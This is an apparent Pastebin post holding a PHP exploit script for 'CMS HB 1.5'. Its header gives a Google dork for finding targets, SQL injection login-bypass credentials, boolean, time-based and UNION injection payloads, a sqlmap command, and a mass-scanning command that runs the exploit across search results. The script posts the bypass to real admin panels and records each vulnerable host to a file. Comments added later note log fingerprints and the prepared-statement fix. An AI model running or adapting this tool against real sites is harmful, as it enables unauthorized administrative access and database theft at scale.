
[EXPLOIT] XPL 0day CMS HB 1.5

Googleinurl May 10th, 2015 (edited) 121 Never
  1. <?php
  2.  
  3. /*
  4.   [+] Discoverer Author: M3t4tr0n
  5.   [+] FACEBOOK:    https://www.facebook.com/M3T4TR0N
  6.   [+] EMAIL:       rammstain960@gmail.com
  7.   [*] Thanks M3t4tr0n
  8.   [*] Neither war between hackers, nor peace for the system.
  9.   ------------------------------------------------------------------------------
  10.  
  11.   # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  12.   # EXPLOIT NAME:  XPL 0day CMS HB 1.5 / INURL BRASIL
  13.   # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  14.   # Email:         inurlbr@gmail.com
  15.   # Blog:          http://blog.inurl.com.br
  16.   # Twitter:       https://twitter.com/googleinurl
  17.   # Fanpage:       https://fb.com/InurlBrasil
  18.   # Pastebin       http://pastebin.com/u/Googleinurl
  19.   # GIT:           https://github.com/googleinurl
  20.   # PSS:           http://packetstormsecurity.com/user/googleinurl
  21.   # EA:            http://exploit4arab.net/author/248/Cleiton_Pinheiro
  22.   # YOUTUBE:       http://youtube.com/c/INURLBrasil
  23.   # PLUS:          http://google.com/+INURLBrasil
  24.   ------------------------------------------------------------------------------
  25.  
  26.   # FAILURE REPORTED: 15/maio/2015
  27.  
  28.   # ADMINISTRATIVE ACCESS PANEL
  29.  
  30.   # Vendor:        http://www.hbwebecia.com.br/
  31.   # CMS HB 1.5
  32.  
  33.   # Google Dork:   inurl:base.php?pagina
  34.  
  35.   # FILE VULN      /admin/logar.phpxx
  36.   # POC:          (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar
  37.  
  38.   # FILE VULN      /base.php
  39.   # POC:          (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)
  40.  
  41.   # Type: boolean-based blind
  42.   Title: AND boolean-based blind - WHERE or HAVING clause
  43.   Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe
  44.  
  45.   # Type: AND/OR time-based blind
  46.   Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  47.   Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC
  48.  
  49.   # Type: UNION query
  50.   Title: Generic UNION query (NULL) - 7 columns
  51.   Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--
  52.  
  53.    # USE SQLMAP:
  54.   ./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'  //
  55.   --dbs --random-agent --level 3 --risk 2  --proxy 'http://localhost:8118' //
  56.   --dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //
  57.   --flush-session --batch
  58.  
  59.   # EXECUTE:       php xpl.php -t http://target.us
  60.  
  61.   # FILE_OUTPUT :  HB.txt
  62.  
  63.   # EXPLOIT MASS USE SCANNER INURLBR
  64.   php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt  --command-all 'php xpl.php -t _TARGET_'
  65.   More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  66.   ------------------------------------------------------------------------------
  67.  
  68.  
  69.  */
  70. error_reporting(1);
  71. set_time_limit(0);
  72. ini_set('display_errors', 1);
  73. ini_set('max_execution_time', 0);
  74. ini_set('allow_url_fopen', 1);
  75. ob_implicit_flush(true);
  76. ob_end_flush();
  77.  
  78. $op_ = getopt('f:t:', array('help::'));
  79. echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";
  80. $menu = "
  81.    -t : SET TARGET.
  82.    Execute:
  83.                  php xpl.php -t target
  84.                  php xpl.php -t target/path
  85. \n";
  86. echo isset($op_['help']) ? exit($menu) : NULL;
  87. $params = array(
  88.     'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),
  89.     'line' => "-----------------------------------------------------------------------------------------------"
  90. );
  91.  
  92. function __plus() {
  93.     ob_flush();
  94.     flush();
  95. }
  96.  
  97. function not_isnull_empty($valor = NULL) {
  98.     RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  99. }
  100.  
/**
 * POST the page's login-bypass request to {host}/admin/logar.php and return what cURL observed.
 *
 * @param array $params  expects 'host' (scheme + host[/path], no trailing slash); 'line' is not read here
 * @return array  [0] => response body, or false when the transport failed,
 *                [1] => curl_getinfo() array (the caller reads its 'redirect_url' entry),
 *                [2] => curl_error() string, '' when nothing went wrong
 *
 * Defender note: this request is straightforward to fingerprint in access/WAF logs.
 * The User-Agent has the shape "Mozilla/<1-50>.0 (compatible; MSIE <1-50>.<1-50>1; Windows NT <1-50>.0)",
 * which only occasionally coincides with a real browser string, and the POST body is a
 * fixed pair of identical SQL tautologies in the login and senha fields.
 */
function __request($params) {
    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");
    // Pseudo-random "browser" identity assembled from rand(1, 50) pieces (see note above).
    curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
    // The injected credentials; both fields carry the same tautology string.
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));
    // TLS verification is switched off completely, so any certificate (self-signed,
    // expired, or interposed) is accepted without complaint.
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);

    $info[0] = curl_exec($objcurl);
    $info[1] = curl_getinfo($objcurl);
    $info[2] = curl_error($objcurl);

    // The '.' merely concatenates two return values that are then discarded; the
    // effective behaviour is "close the handle, then flush output".
    curl_close($objcurl) . __plus();
    unset($objcurl);

    return $info;
}
  123.  
// NOTE: date("h:m:s") prints hour:MONTH:second -- in PHP's date() 'm' is the month
// and 'i' is the minute. Left untouched here; this block only adds comments.
print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";

$_h = __request($params);

// Success heuristic: the login handler answered with a redirect to /admin/index.php.
// When the transport failed, 'redirect_url' may be absent or empty (any notice is hidden
// by error_reporting(1)); strstr() then yields false and the else branch runs.
// On the target side this presumably only works because logar.php builds its SQL from
// the raw login/senha fields; prepared statements are the fix.
if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {
   
    print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";
    print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";
    print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";
    print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";
    // Every hit is appended to HB.txt in the current working directory.
    file_put_contents("HB.txt", "{$params['host']} -  LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);
    __plus();
} else {
   
    // $_h[2] is curl_error(): empty for an HTTP-level "no", populated only on transport failures.
    print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";
}